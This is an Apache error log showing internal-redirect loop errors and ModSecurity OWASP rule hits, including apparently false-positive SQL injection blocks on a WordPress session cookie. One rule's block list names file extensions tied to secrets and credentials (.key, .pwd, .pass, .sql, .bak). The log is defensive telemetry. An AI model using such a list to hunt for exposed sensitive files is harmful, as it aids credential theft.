[Tue May 12 07:27:46.056866 2026] [core:error] [pid 1820198:tid 1820222] [client 4.193.137.131:5555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:46.544025 2026] [core:error] [pid 1820198:tid 1820203] [client 4.193.137.131:5506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:46.544056 2026] [core:error] [pid 1820198:tid 1820203] [client 4.193.137.131:5506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:47.018694 2026] [core:error] [pid 1844863:tid 1844890] [client 4.193.137.131:5573] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:47.018730 2026] [core:error] [pid 1844863:tid 1844890] [client 4.193.137.131:5573] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:47.494622 2026] [core:error] [pid 1842385:tid 1842399] [client 4.193.137.131:5573] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:47.494663 2026] [core:error] [pid 1842385:tid 1842399] [client 4.193.137.131:5573] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:47.998286 2026] [core:error] [pid 1820198:tid 1820223] [client 4.193.137.131:5527] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:47.998314 2026] [core:error] [pid 1820198:tid 1820223] [client 4.193.137.131:5527] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:48.487873 2026] [core:error] [pid 1842385:tid 1842411] [client 4.193.137.131:5533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:48.487911 2026] [core:error] [pid 1842385:tid 1842411] [client 4.193.137.131:5533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:49.017517 2026] [core:error] [pid 1825287:tid 1825317] [client 4.193.137.131:5524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:49.017543 2026] [core:error] [pid 1825287:tid 1825317] [client 4.193.137.131:5524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:49.507603 2026] [core:error] [pid 1844863:tid 1844881] [client 4.193.137.131:5934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:49.507637 2026] [core:error] [pid 1844863:tid 1844881] [client 4.193.137.131:5934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:49.986110 2026] [core:error] [pid 1820198:tid 1820211] [client 4.193.137.131:5512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:49.986136 2026] [core:error] [pid 1820198:tid 1820211] [client 4.193.137.131:5512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:50.462043 2026] [core:error] [pid 1842385:tid 1842396] [client 4.193.137.131:5523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:50.462079 2026] [core:error] [pid 1842385:tid 1842396] [client 4.193.137.131:5523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:50.937210 2026] [core:error] [pid 1825179:tid 1825201] [client 4.193.137.131:5513] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:50.937242 2026] [core:error] [pid 1825179:tid 1825201] [client 4.193.137.131:5513] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:51.412419 2026] [core:error] [pid 1825287:tid 1825320] [client 4.193.137.131:5581] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:51.412452 2026] [core:error] [pid 1825287:tid 1825320] [client 4.193.137.131:5581] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:51.887362 2026] [core:error] [pid 1844863:tid 1844892] [client 4.193.137.131:5526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:51.887395 2026] [core:error] [pid 1844863:tid 1844892] [client 4.193.137.131:5526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:52.362954 2026] [core:error] [pid 1820198:tid 1820221] [client 4.193.137.131:5505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:52.362992 2026] [core:error] [pid 1820198:tid 1820221] [client 4.193.137.131:5505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:28:31.028293 2026] [security2:error] [pid 1844863:tid 1844880] [client 3.215.59.93:31625] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/chachurbate.com"] [unique_id "agK6f_aAnTZtx1_H_wzguwAAAUs"]
[Tue May 12 07:28:31.028578 2026] [security2:error] [pid 1844863:tid 1844880] [client 3.215.59.93:31625] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/chachurbate.com"] [unique_id "agK6f_aAnTZtx1_H_wzguwAAAUs"]
[Tue May 12 07:28:31.028788 2026] [security2:error] [pid 1844863:tid 1844880] [client 3.215.59.93:31625] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/chachurbate.com"] [unique_id "agK6f_aAnTZtx1_H_wzguwAAAUs"]
[Tue May 12 07:28:37.794246 2026] [security2:error] [pid 1820198:tid 1820209] [client 205.164.61.136:53683] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bcc4fc4c4429d973961d55ca8558d886||1778565499||1778565139"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6hc1tk6y7yBJLpJpdtQAAAIk"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:37.794484 2026] [security2:error] [pid 1820198:tid 1820209] [client 205.164.61.136:53683] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6hc1tk6y7yBJLpJpdtQAAAIk"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:37.794740 2026] [security2:error] [pid 1820198:tid 1820209] [client 205.164.61.136:53683] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6hc1tk6y7yBJLpJpdtQAAAIk"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:38.820001 2026] [security2:error] [pid 1842385:tid 1842413] [client 205.164.61.136:43211] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bcc4fc4c4429d973961d55ca8558d886||1778565499||1778565139"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6hhs7kySIUZ3ORnJOqAAAARY"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:38.820269 2026] [security2:error] [pid 1842385:tid 1842413] [client 205.164.61.136:43211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6hhs7kySIUZ3ORnJOqAAAARY"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:38.820526 2026] [security2:error] [pid 1842385:tid 1842413] [client 205.164.61.136:43211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6hhs7kySIUZ3ORnJOqAAAARY"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:39.860433 2026] [security2:error] [pid 1820198:tid 1820205] [client 205.164.61.136:41813] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bcc4fc4c4429d973961d55ca8558d886||1778565499||1778565139"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6h81tk6y7yBJLpJpdugAAAIU"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:39.860809 2026] [security2:error] [pid 1820198:tid 1820205] [client 205.164.61.136:41813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6h81tk6y7yBJLpJpdugAAAIU"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:39.861119 2026] [security2:error] [pid 1820198:tid 1820205] [client 205.164.61.136:41813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6h81tk6y7yBJLpJpdugAAAIU"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:40.872205 2026] [security2:error] [pid 1820198:tid 1820201] [client 205.164.61.136:45631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bcc4fc4c4429d973961d55ca8558d886||1778565499||1778565139"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6iM1tk6y7yBJLpJpdvQAAAIE"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:40.872475 2026] [security2:error] [pid 1820198:tid 1820201] [client 205.164.61.136:45631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6iM1tk6y7yBJLpJpdvQAAAIE"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:40.872741 2026] [security2:error] [pid 1820198:tid 1820201] [client 205.164.61.136:45631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6iM1tk6y7yBJLpJpdvQAAAIE"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:41.910258 2026] [security2:error] [pid 1842385:tid 1842401] [client 205.164.61.136:37793] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bcc4fc4c4429d973961d55ca8558d886||1778565499||1778565139"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6iRs7kySIUZ3ORnJOrAAAAQs"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:41.910480 2026] [security2:error] [pid 1842385:tid 1842401] [client 205.164.61.136:37793] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6iRs7kySIUZ3ORnJOrAAAAQs"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:41.910748 2026] [security2:error] [pid 1842385:tid 1842401] [client 205.164.61.136:37793] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6iRs7kySIUZ3ORnJOrAAAAQs"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:42.919159 2026] [security2:error] [pid 1825179:tid 1825213] [client 205.164.61.136:48829] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bcc4fc4c4429d973961d55ca8558d886||1778565499||1778565139"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6itr1yOh9TvizezjGigAAAE8"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:42.919382 2026] [security2:error] [pid 1825179:tid 1825213] [client 205.164.61.136:48829] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6itr1yOh9TvizezjGigAAAE8"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:42.919645 2026] [security2:error] [pid 1825179:tid 1825213] [client 205.164.61.136:48829] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6itr1yOh9TvizezjGigAAAE8"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:43.932232 2026] [security2:error] [pid 1844863:tid 1844886] [client 205.164.61.136:34353] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bcc4fc4c4429d973961d55ca8558d886||1778565499||1778565139"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6i_aAnTZtx1_H_wzgzQAAAVE"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:43.932442 2026] [security2:error] [pid 1844863:tid 1844886] [client 205.164.61.136:34353] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6i_aAnTZtx1_H_wzgzQAAAVE"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:43.932698 2026] [security2:error] [pid 1844863:tid 1844886] [client 205.164.61.136:34353] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6i_aAnTZtx1_H_wzgzQAAAVE"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:44.912130 2026] [security2:error] [pid 1842385:tid 1842391] [client 205.164.61.136:54803] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bcc4fc4c4429d973961d55ca8558d886||1778565499||1778565139"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6jBs7kySIUZ3ORnJOuAAAAQE"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:44.912346 2026] [security2:error] [pid 1842385:tid 1842391] [client 205.164.61.136:54803] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6jBs7kySIUZ3ORnJOuAAAAQE"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 07:28:44.912598 2026] [security2:error] [pid 1842385:tid 1842391] [client 205.164.61.136:54803] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agK6jBs7kySIUZ3ORnJOuAAAAQE"], referer: https://la-grande-fabrique.com/?p=4057
